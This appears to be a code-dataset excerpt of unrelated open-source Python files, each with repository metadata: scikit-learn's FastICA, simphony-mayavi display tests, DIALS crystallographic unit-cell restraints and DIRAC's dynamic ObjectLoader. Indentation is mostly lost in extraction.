# we set lim to tol+1 to be sure to enter at least once in next while
lim = tol + 1
while ((lim > tol) & (n_iterations < (max_iter - 1))):
wtx = np.dot(w.T, X)
nonlin = g(wtx, fun_args)
if isinstance(nonlin, tuple):
gwtx, g_wtx = nonlin
else:
if not callable(gprime):
raise ValueError('The function supplied does not return a '
'tuple. Therefore fun_prime has to be a '
'function, not %s' % str(type(gprime)))
warnings.warn("Passing g and gprime separately is deprecated "
"and will be removed in 0.14.",
DeprecationWarning, stacklevel=2)
gwtx = nonlin
g_wtx = gprime(wtx, fun_args)
w1 = (X * gwtx).mean(axis=1) - g_wtx.mean() * w
_gs_decorrelation(w1, W, j)
w1 /= np.sqrt((w1 ** 2).sum())
lim = np.abs(np.abs((w1 * w).sum()) - 1)
w = w1
n_iterations = n_iterations + 1
W[j, :] = w
return W
def _ica_par(X, tol, g, gprime, fun_args, max_iter, w_init):
"""Parallel FastICA.
Used internally by FastICA --main loop
"""
n, p = X.shape
W = _sym_decorrelation(w_init)
# we set lim to tol+1 to be sure to enter at least once in next while
lim = tol + 1
it = 0
while ((lim > tol) and (it < (max_iter - 1))):
wtx = np.dot(W, X)
nonlin = g(wtx, fun_args)
if isinstance(nonlin, tuple):
gwtx, g_wtx = nonlin
else:
if not callable(gprime):
raise ValueError('The function supplied does not return a '
'tuple. Therefore fun_prime has to be a '
'function, not %s' % str(type(gprime)))
warnings.warn("Passing g and gprime separately is deprecated "
"and will be removed in 0.14.",
DeprecationWarning, stacklevel=2)
gwtx = nonlin
g_wtx = gprime(wtx, fun_args)
W1 = (np.dot(gwtx, X.T) / float(p)
- np.dot(np.diag(g_wtx.mean(axis=1)), W))
W1 = _sym_decorrelation(W1)
lim = max(abs(abs(np.diag(np.dot(W1, W.T))) - 1))
W = W1
it += 1
return W
def fastica(X, n_components=None, algorithm="parallel", whiten=True,
fun="logcosh", fun_prime='', fun_args={}, max_iter=200,
tol=1e-04, w_init=None, random_state=None):
"""Perform Fast Independent Component Analysis.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vector, where n_samples is the number of samples and
n_features is the number of features.
n_components : int, optional
Number of components to extract. If None no dimension reduction
is performed.
algorithm : {'parallel', 'deflation'}, optional
Apply a parallel or deflational FASTICA algorithm.
whiten: boolean, optional
If True perform an initial whitening of the data.
If False, the data is assumed to have already been
preprocessed: it should be centered, normed and white.
Otherwise you will get incorrect results.
In this case the parameter n_components will be ignored.
fun : string or function, optional. Default: 'logcosh'
The functional form of the G function used in the
approximation to neg-entropy. Could be either 'logcosh', 'exp',
or 'cube'.
You can also provide your own function. It should return a tuple
containing the value of the function, and of its derivative, in the
point. Example:
def my_g(x):
return x ** 3, 3 * x ** 2
Supplying the derivative through the `fun_prime` attribute is
still supported, but deprecated.
fun_prime : empty string ('') or function, optional, deprecated.
See fun.
fun_args: dictionary, optional
Arguments to send to the functional form.
If empty and if fun='logcosh', fun_args will take value
{'alpha' : 1.0}
max_iter: int, optional
Maximum number of iterations to perform
tol: float, optional
A positive scalar giving the tolerance at which the
un-mixing matrix is considered to have converged
w_init: (n_components, n_components) array, optional
Initial un-mixing array of dimension (n.comp,n.comp).
If None (default) then an array of normal r.v.'s is used
random_state: int or RandomState
        Pseudo-random number generator state used for random sampling.
Returns
-------
K: (n_components, p) array or None.
If whiten is 'True', K is the pre-whitening matrix that projects data
onto the first n.comp principal components. If whiten is 'False', K is
'None'.
W: (n_components, n_components) array
estimated un-mixing matrix
The mixing matrix can be obtained by::
w = np.dot(W, K.T)
A = w.T * (w * w.T).I
S: (n_components, n) array
estimated source matrix
Notes
-----
The data matrix X is considered to be a linear combination of
non-Gaussian (independent) components i.e. X = AS where columns of S
contain the independent components and A is a linear mixing
matrix. In short ICA attempts to `un-mix' the data by estimating an
un-mixing matrix W where ``S = W K X.``
This implementation was originally made for data of shape
[n_features, n_samples]. Now the input is transposed
before the algorithm is applied. This makes it slightly
faster for Fortran-ordered input.
Implemented using FastICA:
`A. Hyvarinen and E. Oja, Independent Component Analysis:
Algorithms and Applications, Neural Networks, 13(4-5), 2000,
pp. 411-430`
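    Examples
    --------
    A minimal sketch with synthetic data (results depend on the random seed)::

        >>> import numpy as np
        >>> S = np.random.standard_t(1.5, size=(2, 10000))
        >>> A = np.array([[1., 1.], [0., 2.]])   # mixing matrix
        >>> X = np.dot(A, S).T                   # shape [n_samples, n_features]
        >>> K, W, S_est = fastica(X, n_components=2)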
"""
random_state = check_random_state(random_state)
# make interface compatible with other decompositions
X = array2d(X).T
alpha = fun_args.get('alpha', 1.0)
if (alpha < 1) or (alpha > 2):
raise ValueError("alpha must be in [1,2]")
gprime = None
if isinstance(fun, str):
# Some standard nonlinear functions
# XXX: these should be optimized, as they can be a bottleneck.
if fun == 'logcosh':
def g(x, fun_args):
                alpha = fun_args.get('alpha', 1.0)  # re-read from the fun_args passed at call time
gx = np.tanh(alpha * x)
g_x = alpha * (1 - gx ** 2)
return gx, g_x
elif fun == 'exp':
def g(x, fun_args):
exp = np.exp(-(x ** 2) / 2)
gx = x * exp
g_x = (1 - x ** 2) * exp
return gx, g_x
elif fun == 'cube':
def g(x, fun_args):
return x ** 3, 3 * x ** 2
else:
raise ValueError('fun argument should be one of logcosh, exp or'
' cube')
elif callable(fun):
def g(x, fun_args):
return fun(x, **fun_args)
if callable(fun_prime):
def gprime(x, fun_args):
return fun_prime(x, **fun_args)
else:
raise ValueError('fun argument should be either a string '
'(one of logcosh, exp or cube) or a function')
n, p = X.shape
if not whiten and n_components is not None:
n_components = None
warnings.warn('Ignoring n_components with whiten=False.')
if n_components is None:
n_components = min(n, p)
if (n_components > min(n, p)):
n_components = min(n, p)
print("n_components is too large: it will be set to %s" % n_components)
if whiten:
# Centering the columns (ie the variables)
X = X - X.mean(axis=-1)[:, np.newaxis]
# Whitening and preprocessing by PCA
u, d, _ = linalg.svd(X, full_matrices=False)
del _
K = (u / d).T[:n_components] # see (6.33) p.140
del u, d
X1 = np.dot(K, X)
# see (13.6) p.267 Here X1 is white and data
# in X has been projected onto a subspace by PCA
X1 *= np.sqrt(p)
else:
        # X must be cast to floats to avoid typing issues with numpy
        # 2.0 and the line below
X1 = as_float_array(X, copy=True)
if w_init is None:
w_init = random_state.normal(size=(n_components, n_components))
else:
w_init = np.asarray(w_init)
if w_init.shape != (n_components, n_components):
raise ValueError("w_init has invalid shape -- should be %(shape)s"
% {'shape': (n_components, n_components)})
kwargs = {'tol': tol,
'g': g,
'gprime': gprime,
'fun_args': fun_args,
'max_iter': max_iter,
'w_init': w_init}
if algorithm == 'parallel':
W = _ica_par(X1, **kwargs)
elif algorithm == 'deflation':
W = _ica_def(X1, **kwargs)
else:
raise ValueError('Invalid algorithm: must be either `parallel` or' +
' `deflation`.')
del X1
if whiten:
S = np.dot(np.dot(W, K), X)
return K, W, S.T
else:
S = np.dot(W, X)
return None, W, S.T
class FastICA(BaseEstimator, TransformerMixin):
"""FastICA; a fast algorithm for Independent Component Analysis
Parameters
----------
n_components : int, optional
Number of components to use. If none is passed, all are used.
algorithm : {'parallel', 'deflation'}
Apply parallel or deflational algorithm for FastICA
whiten : boolean, optional
If whiten is false, the data is already considered to be
whitened, and no whitening is performed.
fun : string or function, optional. Default: 'logcosh'
The functional form of the G function used in the
approximation to neg-entropy. Could be either 'logcosh', 'exp',
or 'cube'.
You can also provide your own function. It should return a tuple
containing the value of the function, and of its derivative, in the
point. Example:
def my_g(x):
return x ** 3, 3 * x ** 2
Supplying the derivative through the `fun_prime` attribute is
still supported, but deprecated.
fun_prime : empty string ('') or function, optional, deprecated.
See fun.
fun_args: dictionary, optional
Arguments to send to the functional form.
If empty and if fun='logcosh', fun_args will take value
{'alpha' : 1.0}
max_iter : int, optional
Maximum number of iterations during fit
tol : float, optional
Tolerance on update at each iteration
    w_init : None or an (n_components, n_components) ndarray
        The un-mixing matrix used to initialize the algorithm.
random_state: int or RandomState
        Pseudo-random number generator state used for random sampling.
Attributes
----------
`components_` : 2D array, [n_components, n_features]
The unmixing matrix
`sources_`: 2D array, [n_samples, n_components]
The estimated latent sources of the data.
Notes
-----
Implementation based on
`A. Hyvarinen and E. Oja, Independent Component Analysis:
Algorithms and Applications, Neural Networks, 13(4-5), 2000,
pp. 411-430`
"""
def __init__(self, n_components=None, algorithm='parallel', whiten=True,
fun='logcosh', fun_prime='', fun_args=None, max_iter=200,
tol=1e-4, w_init=None, random_state=None):
super(FastICA, self).__init__()
self.n_components = n_components
self.algorithm = algorithm
self.whiten = whiten
self.fun = fun
self.fun_prime = fun_prime
self.fun_args = fun_args
self.max_iter = max_iter
self.tol = tol
self.w_init = w_init
self.random_state = random_state
def fit(self, X, y=None):
fun_args = {} if self.fun_args is None else self.fun_args
whitening_, unmixing_, sources_ = fastica(
X, self.n_components, self.algorithm, self.whiten, self.fun,
self.fun_prime, fun_args, self.max_iter, self.tol, self.w_init,
random_state=self.random_state)
if self.whiten:
self.components_ = np.dot(unmixing_, whitening_)
else:
self.components_ = unmixing_
self.sources_ = sources_
return self
def transform(self, X, y=None):
"""Apply un-mixing matrix "W" to X to recover the sources
S = X * W.T
"""
X = array2d(X)
return np.dot(X, self.components_.T)
def get_mixing_matrix(self):
"""Compute the mixing matrix
"""
return linalg.pinv(self.components_)
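# Minimal usage sketch (X is hypothetical data of shape [n_samples, n_features]):
#   ica = FastICA(n_components=2, random_state=0).fit(X)
#   S = ica.sources_                 # estimated sources, [n_samples, n_components]
#   A = ica.get_mixing_matrix()      # pseudo-inverse of the unmixing matrix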
|
florian-f/sklearn
|
sklearn/decomposition/fastica_.py
|
Python
|
bsd-3-clause
| 14,739
|
[
"Gaussian"
] |
7c8bf18ca788e26c2eaf9fed9485bdf872d24cd7f5a48adce3e21c4212e29c23
|
import unittest
import numpy
from pyface.ui.qt4.util.modal_dialog_tester import ModalDialogTester
from traits.etsconfig.api import ETSConfig
from mayavi import mlab
from simphony_mayavi.show import show
from simphony.cuds.lattice import make_cubic_lattice
from simphony.cuds.mesh import Mesh, Point
from simphony.cuds.particles import Particles, Particle
def check_scene_opened_then_close(func):
    ''' Ensure that the decorated test opens at least one mayavi scene,
    then close all open scenes once it finishes '''
def new_func(test_case):
try:
func(test_case)
finally:
num_scenes = len(mlab.get_engine().scenes)
test_case.assertNotEqual(num_scenes, 0,
"No scene is opened")
# close everything
mlab.close(all=True)
return new_func
class TestShow(unittest.TestCase):
@unittest.skipIf(ETSConfig.toolkit != "qt4",
"this testcase requires backend == qt4")
@check_scene_opened_then_close
def test_lattice_show(self):
lattice = make_cubic_lattice(
'test', 0.2, (10, 10, 1), origin=(0.2, -2.4, 0.))
def function():
show(lattice)
return True
tester = ModalDialogTester(function)
tester.open_and_run(when_opened=lambda x: x.close(accept=False))
self.assertTrue(tester.result)
@unittest.skipIf(ETSConfig.toolkit != "qt4",
"this testcase requires backend == qt4")
@check_scene_opened_then_close
def test_mesh_show(self):
points = numpy.array([
[0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1],
[2, 0, 0], [3, 0, 0], [3, 1, 0], [2, 1, 0],
[2, 0, 1], [3, 0, 1], [3, 1, 1], [2, 1, 1]],
'f')
mesh = Mesh('test')
point_iter = (Point(coordinates=point) for point in points)
mesh.add(point_iter)
def function():
show(mesh)
return True
tester = ModalDialogTester(function)
tester.open_and_run(when_opened=lambda x: x.close(accept=False))
self.assertTrue(tester.result)
@unittest.skipIf(ETSConfig.toolkit != "qt4",
"this testcase requires backend == qt4")
@check_scene_opened_then_close
def test_particles_show(self):
coordinates = numpy.array([
[0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1],
[2, 0, 0], [3, 0, 0], [3, 1, 0], [2, 1, 0],
[2, 0, 1], [3, 0, 1], [3, 1, 1], [2, 1, 1]],
'f')
particles = Particles('test')
particle_iter = (Particle(coordinates=point+3)
for point in coordinates)
particles.add(particle_iter)
def function():
show(particles)
return True
tester = ModalDialogTester(function)
tester.open_and_run(when_opened=lambda x: x.close(accept=False))
self.assertTrue(tester.result)
def test_unknown_container(self):
container = object()
with self.assertRaises(TypeError):
show(container)
|
simphony/simphony-mayavi
|
simphony_mayavi/tests/test_show.py
|
Python
|
bsd-2-clause
| 3,093
|
[
"Mayavi"
] |
b2af45e85a557990064c170411d75f961c32b99ca5c35e71f615ba9d5db56be9
|
from __future__ import annotations
import logging
from math import pi
from scitbx import sparse
from scitbx.array_family import flex
from dials_refinement_helpers_ext import CalculateCellGradients
logger = logging.getLogger(__name__)
DEG2RAD = pi / 180.0
RAD2DEG = 180.0 / pi
class DerivedParameterTie:
"""Calculate the restraint and gradients for a single derived parameter
of the model"""
def __init__(self, target, weight):
self._target = target
self._w = weight
self._dRdp = None
def residual(self, parameter_value, parameter_gradients):
"""Calculate residual R, cache gradients"""
d = parameter_value - self._target
self._dRdp = parameter_gradients
return d
def gradient(self):
"""Return dR/dp"""
return self._dRdp
def weight(self):
"""Return restraint weight"""
return self._w
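# For example, tying a cell edge to a target of 90.0 with sigma 0.1 gives
# DerivedParameterTie(target=90.0, weight=1.0 / 0.1**2); residual(90.5, grads)
# then returns 0.5 and caches grads for later retrieval via gradient().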
class SingleUnitCellTie:
"""Tie the parameters of a single unit cell model parameterisation to
target values via least-squares restraints. The restraints will be expressed
in terms of real space unit cell constants, whilst the underlying parameters
are encapsulated in the model parameterisation object"""
def __init__(self, model_parameterisation, target, sigma):
"""model_parameterisation is a CrystalUnitCellParameterisation
target is a sequence of 6 elements describing the target cell parameters
sigma is a sequence of 6 elements giving the 'sigma' for each of the
terms in target, from which weights for the residuals will be calculated.
Values of zero will remove the restraint for the cell parameter at
that position"""
self._xlucp = model_parameterisation
self._target = target
assert len(self._target) == 6
assert len(sigma) == 6
assert None not in sigma
# calculate gradients of cell parameters wrt model parameters.
grads = self._calculate_uc_gradients()
msg = (
"Unit cell similarity restraints were requested for both the "
"{0} and {1} dimensions, however for the crystal in experiment "
"{2} these are constrained to be equal. Only the strongest "
"of these restraints will be retained."
)
# identify cell dimensions constrained to be equal
a, b, c, aa, bb, cc = self._xlucp.get_model().get_unit_cell().parameters()
if abs(a - b) < 1e-10:
grad_diff = [abs(e1 - e2) for (e1, e2) in zip(grads[0], grads[1])]
if max(grad_diff) < 1e-10:
# a and b are equal, therefore keep only the strongest restraint
logger.debug(msg.format("a", "b", self._xlucp.get_experiment_ids()[0]))
strong, weak = sorted([sigma[0], sigma[1]])
if strong == 0.0:
strong = weak
sigma[0] = strong
sigma[1] = 0.0
if abs(a - c) < 1e-10:
grad_diff = [abs(e1 - e2) for (e1, e2) in zip(grads[0], grads[2])]
if max(grad_diff) < 1e-10:
# a and c are equal, therefore keep only the strongest restraint
logger.debug(msg.format("a", "c", self._xlucp.get_experiment_ids()[0]))
strong, weak = sorted([sigma[0], sigma[2]])
if strong == 0.0:
strong = weak
sigma[0] = strong
sigma[2] = 0.0
if abs(b - c) < 1e-10:
grad_diff = [abs(e1 - e2) for (e1, e2) in zip(grads[1], grads[2])]
if max(grad_diff) < 1e-10:
# b and c are equal, therefore keep only the strongest restraint
logger.debug(msg.format("b", "c", self._xlucp.get_experiment_ids()[0]))
strong, weak = sorted([sigma[1], sigma[2]])
if strong == 0.0:
strong = weak
sigma[1] = strong
sigma[2] = 0.0
# A gradient of zero indicates that cell parameter is constrained and thus
# to be ignored in restraints
msg = (
"Unit cell similarity restraints were requested for the {0} "
"parameter, however for the crystal in experiment {1}, {0} is "
"constrained. This restraint will be removed."
)
_sigma = []
for i, (sig, grad, pname) in enumerate(
zip(sigma, grads, ["a", "b", "c", "alpha", "beta", "gamma"])
):
tst = (abs(g) > 1.0e-10 for g in grad)
if any(tst):
if sig == 0.0:
sig = None
_sigma.append(sig)
else:
logger.debug(msg.format(pname, self._xlucp.get_experiment_ids()[0]))
_sigma.append(None)
# For each non-zero sigma create a restraint between the relevant cell
# parameter and its target value
self._ties = []
for t, s in zip(self._target, _sigma):
if s is not None:
self._ties.append(DerivedParameterTie(t, 1.0 / s**2))
else:
self._ties.append(None)
# set up empty weights list
self._weights = []
def _calculate_uc_gradients(self, sel=[True] * 6):
"""Calculate gradients of the unit cell parameters with respect to
each of the parameters of the crystal unit cell model parameterisation"""
B = self._xlucp.get_state()
dB_dp = flex.mat3_double(self._xlucp.get_ds_dp())
# Use C++ function for speed
ccg = CalculateCellGradients(B, dB_dp)
nparam = len(dB_dp)
da = list(ccg.da_dp()) if sel[0] else [0.0] * nparam
db = list(ccg.db_dp()) if sel[1] else [0.0] * nparam
dc = list(ccg.dc_dp()) if sel[2] else [0.0] * nparam
daa = list(ccg.daa_dp()) if sel[3] else [0.0] * nparam
dbb = list(ccg.dbb_dp()) if sel[4] else [0.0] * nparam
dcc = list(ccg.dcc_dp()) if sel[5] else [0.0] * nparam
return (da, db, dc, daa, dbb, dcc)
def residuals(self):
"""Calculate and return the residuals, cache gradients"""
cell_params = self._xlucp.get_model().get_unit_cell().parameters()
# gradients of the cell parameters wrt model parameters
grads = self._calculate_uc_gradients(sel=[t is not None for t in self._ties])
R = []
for p, g, t in zip(cell_params, grads, self._ties):
if t is None:
continue
R.append(t.residual(parameter_value=p, parameter_gradients=g))
return R
@property
def num_residuals(self):
"""Get the number of residuals"""
return len(self._ties) - self._ties.count(None)
def gradients(self):
"""For each residual, return the gradients dR/dp. Requires residuals to be
called first"""
dRdp = []
for t in self._ties:
if t is None:
continue
dRdp.append(t.gradient())
return dRdp
def weights(self):
"""Return the weights for the residuals vector"""
# the weights do not change so cache them
if not self._weights:
self._weights = []
for t in self._ties:
if t is None:
continue
self._weights.append(t.weight())
return self._weights
class MeanUnitCellTie:
"""Tie the parameters of multiple unit cell model parameterisations to
central values via least-squares restraints. The restraints will be expressed
in terms of real space unit cell constants, whilst the underlying parameters
are encapsulated in the model parameterisation objects"""
def __init__(self, model_parameterisations, sigma):
"""model_parameterisations is a list of CrystalUnitCellParameterisations
sigma is a sequence of 6 elements giving the 'sigma' for each of the
unit cell parameters, from which weights for the residuals will be
calculated. Values of zero in sigma will remove the restraint for the
cell parameter at that position"""
self._xlucp = model_parameterisations
self._nxls = len(model_parameterisations)
# common factors used in gradient calculations
self._meangradfac = 1.0 / self._nxls
self._gradfac = 1.0 - self._meangradfac
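        # For residuals R_i = c_i - mean(c), the gradient w.r.t. crystal i's own
        # parameters carries a factor (1 - 1/n) while every other crystal gets
        # -1/n; these are the two factors applied in _construct_grad_block.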
self._weights = []
# initially want to calculate all gradients
self._sel = [True] * 6
# identify any cell dimensions constrained to be equal. If any are and a
# restraint has been requested for that cell dimension, remove the restraint
# for all crystals and warn in the log
msg = (
"Unit cell similarity restraints were requested for both the "
"{0} and {1} dimensions, however for the crystal in experiment "
"{2} these are constrained to be equal. Only the strongest "
"of these restraints will be retained for all crystals in "
"the restrained group."
)
for ixl, xlucp in enumerate(self._xlucp):
B = xlucp.get_state()
dB_dp = flex.mat3_double(xlucp.get_ds_dp())
ccg = CalculateCellGradients(B, dB_dp)
grads = [
ccg.da_dp(),
ccg.db_dp(),
ccg.dc_dp(),
ccg.daa_dp(),
ccg.dbb_dp(),
ccg.dcc_dp(),
]
a, b, c, aa, bb, cc = xlucp.get_model().get_unit_cell().parameters()
if abs(a - b) < 1e-10:
grad_diff = [abs(e1 - e2) for (e1, e2) in zip(grads[0], grads[1])]
if max(grad_diff) < 1e-10:
# a and b are equal for this crystal, therefore keep only the
# strongest requested restraint
if sigma[0] > 0.0 and sigma[1] > 0.0:
logger.debug(
msg.format("a", "b", xlucp.get_experiment_ids()[0])
)
strong, weak = sorted([sigma[0], sigma[1]])
sigma[0] = strong
sigma[1] = 0.0
if abs(a - c) < 1e-10:
grad_diff = [abs(e1 - e2) for (e1, e2) in zip(grads[0], grads[2])]
if max(grad_diff) < 1e-10:
# a and c are equal for this crystal, therefore keep only the
# strongest requested restraint
if sigma[0] > 0.0 and sigma[2] > 0.0:
logger.debug(
msg.format("a", "c", xlucp.get_experiment_ids()[0])
)
strong, weak = sorted([sigma[0], sigma[2]])
sigma[0] = strong
sigma[2] = 0.0
if abs(b - c) < 1e-10:
grad_diff = [abs(e1 - e2) for (e1, e2) in zip(grads[1], grads[2])]
if max(grad_diff) < 1e-10:
# b and c are equal for this crystal, therefore keep only the
# strongest requested restraint
if sigma[1] > 0.0 and sigma[2] > 0.0:
logger.debug(
msg.format("b", "c", xlucp.get_experiment_ids()[0])
)
strong, weak = sorted([sigma[1], sigma[2]])
sigma[1] = strong
sigma[2] = 0.0
# A gradient of zero indicates that cell parameter is constrained and thus
# to be ignored in restraints
# _sigma = []
msg = (
"Unit cell similarity restraints were requested for the {0} "
"parameter, however for the crystal in experiment {1}, {0} is "
"constrained. This restraint will be removed for all crystals in "
"the restrained group."
)
for i, (grad, pname) in enumerate(
zip(grads, ["a", "b", "c", "alpha", "beta", "gamma"])
):
tst = (abs(g) <= 1.0e-10 for g in grad)
if all(tst):
# this parameter is constrained, so remove any requested restraints
# at this position
if sigma[i] > 0.0:
logger.debug(msg.format(pname, xlucp.get_experiment_ids()[0]))
sigma[i] = 0.0
# set the selection for gradient calculations to the unconstrained parameters
self._sel = [s > 0.0 for s in sigma]
self.nrestraints_per_cell = self._sel.count(True)
# repeat the weights for each unit cell being restrained
weights = [1.0 / s**2 for s in sigma if s > 0.0]
weights = [flex.double(self._nxls, w) for w in weights]
self._weights = weights[0]
for w in weights[1:]:
self._weights.extend(w)
@staticmethod
def average_fn(vals):
return flex.mean(vals)
def residuals(self):
"""Calculate and return the residuals"""
cells = [
xlucp.get_model().get_unit_cell().parameters() for xlucp in self._xlucp
]
a, b, c, aa, bb, cc = [flex.double(e) for e in zip(*cells)]
resid_a = a - self.average_fn(a) if self._sel[0] else None
resid_b = b - self.average_fn(b) if self._sel[1] else None
resid_c = c - self.average_fn(c) if self._sel[2] else None
resid_aa = aa - self.average_fn(aa) if self._sel[3] else None
resid_bb = bb - self.average_fn(bb) if self._sel[4] else None
resid_cc = cc - self.average_fn(cc) if self._sel[5] else None
# collect the residuals for restrained parameters only
resid = [
e
for e in [resid_a, resid_b, resid_c, resid_aa, resid_bb, resid_cc]
if e is not None
]
# stack the columns
R = resid[0]
for r in resid[1:]:
R.extend(r)
return R
@property
def num_residuals(self):
"""Get the number of residuals"""
return self.nrestraints_per_cell * self._nxls
def _construct_grad_block(self, param_grads, i):
"""helper function to construct a block of gradients. The length of
param_grads is the number of columns of the block. i selects a row of
interest from the block corresponding to the residual for a particular
unit cell"""
mean_grads = param_grads * self._meangradfac
param_grads *= self._gradfac
block = sparse.matrix(self._nxls, len(param_grads))
for j, (g, mg) in enumerate(zip(param_grads, mean_grads)):
if abs(mg) > 1e-20: # skip gradients close to zero
col = flex.double(flex.grid(self._nxls, 1), -1.0 * mg)
block.assign_block(col, 0, j)
if abs(g) > 1e-20: # skip gradient close to zero
block[i, j] = g
return block
def gradients(self):
"""A generator function to return the gradients dR/dp for all the restraints
referring to a particular crystal's cell parameters. The return value is
a list of sparse matrices, one for each of the 6 cell parameters being
restrained. Each sparse matrix has as many columns as the crystal unit
cell parameterisation has parameters, and as many rows as there are crystals
being restrained. Gradients of zero are detected and not set in the sparse
matrices to save memory."""
for i, xlucp in enumerate(self._xlucp):
B = xlucp.get_state()
dB_dp = flex.mat3_double(xlucp.get_ds_dp())
# Use C++ function for speed
ccg = CalculateCellGradients(B, dB_dp)
dRdp = []
if self._sel[0]:
dRdp.append(self._construct_grad_block(ccg.da_dp(), i))
if self._sel[1]:
dRdp.append(self._construct_grad_block(ccg.db_dp(), i))
if self._sel[2]:
dRdp.append(self._construct_grad_block(ccg.dc_dp(), i))
if self._sel[3]:
dRdp.append(self._construct_grad_block(ccg.daa_dp(), i))
if self._sel[4]:
dRdp.append(self._construct_grad_block(ccg.dbb_dp(), i))
if self._sel[5]:
dRdp.append(self._construct_grad_block(ccg.dcc_dp(), i))
yield dRdp
def weights(self):
"""Return the weights for the residuals vector"""
return self._weights
class LowMemoryMeanUnitCellTie(MeanUnitCellTie):
def _construct_grad_block(self, param_grads, i):
"""helper function to construct a block of gradients. The length of
param_grads is the number of columns of the block. i selects a row of
interest from the block corresponding to the residual for a particular
unit cell"""
param_grads *= self._gradfac
block = sparse.matrix(self._nxls, len(param_grads))
for j, g in enumerate(param_grads):
if abs(g) > 1e-20: # skip gradient close to zero
block[i, j] = g
return block
class MedianUnitCellTie(MeanUnitCellTie):
@staticmethod
def average_fn(vals):
return flex.median(vals)
def _construct_grad_block(self, param_grads, i):
"""helper function to construct a block of gradients. The length of
param_grads is the number of columns of the block. i selects a row of
interest from the block corresponding to the residual for a particular
unit cell"""
# this override removes the product with self._gradfac, which is only
# relevant for the 'mean' versions of this class.
# param_grads *= self._gradfac
block = sparse.matrix(self._nxls, len(param_grads))
for j, g in enumerate(param_grads):
if abs(g) > 1e-20: # skip gradient close to zero
block[i, j] = g
return block
|
dials/dials
|
algorithms/refinement/restraints/restraints.py
|
Python
|
bsd-3-clause
| 17,973
|
[
"CRYSTAL"
] |
ad1eacd544e6339a11da9450bd48c7d6bba4cc7dfc6690393d3cf566809c3359
|
import re
import types
import imp
import pkgutil
import collections
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Utilities import List, DIRACSingleton
from DIRAC.ConfigurationSystem.Client.Helpers import CSGlobals
class ObjectLoader( object ):
__metaclass__ = DIRACSingleton.DIRACSingleton
def __init__( self, baseModules = False ):
""" init
"""
if not baseModules:
baseModules = [ 'DIRAC' ]
self.__rootModules = baseModules
self.__objs = {}
self.__generateRootModules( baseModules )
def __rootImport( self, modName, hideExceptions = False ):
""" Auto search which root module has to be used
"""
for rootModule in self.__rootModules:
impName = modName
if rootModule:
impName = "%s.%s" % ( rootModule, impName )
gLogger.debug( "Trying to load %s" % impName )
result = self.__recurseImport( impName, hideExceptions = hideExceptions )
#Error. Something cannot be imported. Return error
if not result[ 'OK' ]:
return result
#Huge success!
if result[ 'Value' ]:
return S_OK( ( impName, result[ 'Value' ] ) )
#Nothing found, continue
#Return nothing found
return S_OK()
def __recurseImport( self, modName, parentModule = None, hideExceptions = False, fullName = False ):
""" Internal function to load modules
"""
if type( modName ) in types.StringTypes:
modName = List.fromChar( modName, "." )
if not fullName:
fullName = ".".join( modName )
if fullName in self.__objs:
return S_OK( self.__objs[ fullName ] )
try:
if parentModule:
impData = imp.find_module( modName[0], parentModule.__path__ )
else:
impData = imp.find_module( modName[0] )
impModule = imp.load_module( modName[0], *impData )
if impData[0]:
impData[0].close()
except ImportError, excp:
if str( excp ).find( "No module named %s" % modName[0] ) == 0:
return S_OK( None )
errMsg = "Can't load %s in %s" % ( ".".join( modName ), parentModule.__path__[0] )
if not hideExceptions:
gLogger.exception( errMsg )
return S_ERROR( errMsg )
if len( modName ) == 1:
self.__objs[ fullName ] = impModule
return S_OK( impModule )
return self.__recurseImport( modName[1:], impModule,
hideExceptions = hideExceptions, fullName = fullName )
def __generateRootModules( self, baseModules ):
""" Iterate over all the possible root modules
"""
self.__rootModules = baseModules
for rootModule in reversed( CSGlobals.getCSExtensions() ):
if rootModule[-5:] != "DIRAC" and rootModule not in self.__rootModules:
self.__rootModules.append( "%sDIRAC" % rootModule )
self.__rootModules.append( "" )
def loadModule( self, importString ):
""" Load a module from an import string
"""
result = self.__rootImport( importString )
if not result[ 'OK' ]:
return result
if not result[ 'Value' ]:
return S_ERROR( "No module %s found" % importString )
return S_OK( result[ 'Value' ][1] )
def loadObject( self, importString, objName = False ):
""" Load an object from inside a module
"""
result = self.loadModule( importString )
if not result[ 'OK' ]:
return result
modObj = result[ 'Value' ]
if not objName:
objName = List.fromChar( importString, "." )[-1]
try:
return S_OK( getattr( modObj, objName ) )
except AttributeError:
return S_ERROR( "%s does not contain a %s object" % ( importString, objName ) )
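  # Usage sketch: ObjectLoader().loadObject( "Core.Utilities.List", "fromChar" )
  # returns S_OK( List.fromChar ), resolving the module against each root
  # module ( DIRAC and any configured extensions ) in turn.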
def getObjects( self, modulePath, reFilter = None, parentClass = None, recurse = False ):
"""
Search for modules under a certain path
modulePath is the import string needed to access the parent module. Root modules will be included automatically (like DIRAC). For instance "ConfigurationSystem.Service"
reFilter is a regular expression to filter what to load. For instance ".*Handler"
parentClass is a class object from which the loaded modules have to import from. For instance RequestHandler
"""
if 'OrderedDict' in dir( collections ):
modules = collections.OrderedDict()
else:
modules = {}
if type( reFilter ) in types.StringTypes:
reFilter = re.compile( reFilter )
for rootModule in self.__rootModules:
if rootModule:
impPath = "%s.%s" % ( rootModule, modulePath )
else:
impPath = modulePath
gLogger.debug( "Trying to load %s" % impPath )
result = self.__recurseImport( impPath )
if not result[ 'OK' ]:
return result
if not result[ 'Value' ]:
continue
parentModule = result[ 'Value' ]
fsPath = parentModule.__path__[0]
gLogger.verbose( "Loaded module %s at %s" % ( impPath, fsPath ) )
for modLoader, modName, isPkg in pkgutil.walk_packages( parentModule.__path__ ):
if reFilter and not reFilter.match( modName ):
continue
if isPkg:
if recurse:
result = self.getObjects( "%s.%s" % ( modulePath, modName ), reFilter = reFilter,
parentClass = parentClass, recurse = recurse )
if not result[ 'OK' ]:
return result
modules.update( result[ 'Value' ] )
continue
modKeyName = "%s.%s" % ( modulePath, modName )
if modKeyName in modules:
continue
fullName = "%s.%s" % ( impPath, modName )
result = self.__recurseImport( modName, parentModule = parentModule, fullName = fullName )
if not result[ 'OK' ]:
return result
if not result[ 'Value' ]:
continue
modObj = result[ 'Value' ]
try:
modClass = getattr( modObj, modName )
except AttributeError:
gLogger.warn( "%s does not contain a %s object" % ( fullName, modName ) )
continue
if parentClass and not issubclass( modClass, parentClass ):
continue
#Huge success!
modules[ modKeyName ] = modClass
return S_OK( modules )
|
avedaee/DIRAC
|
Core/Utilities/ObjectLoader.py
|
Python
|
gpl-3.0
| 6,137
|
[
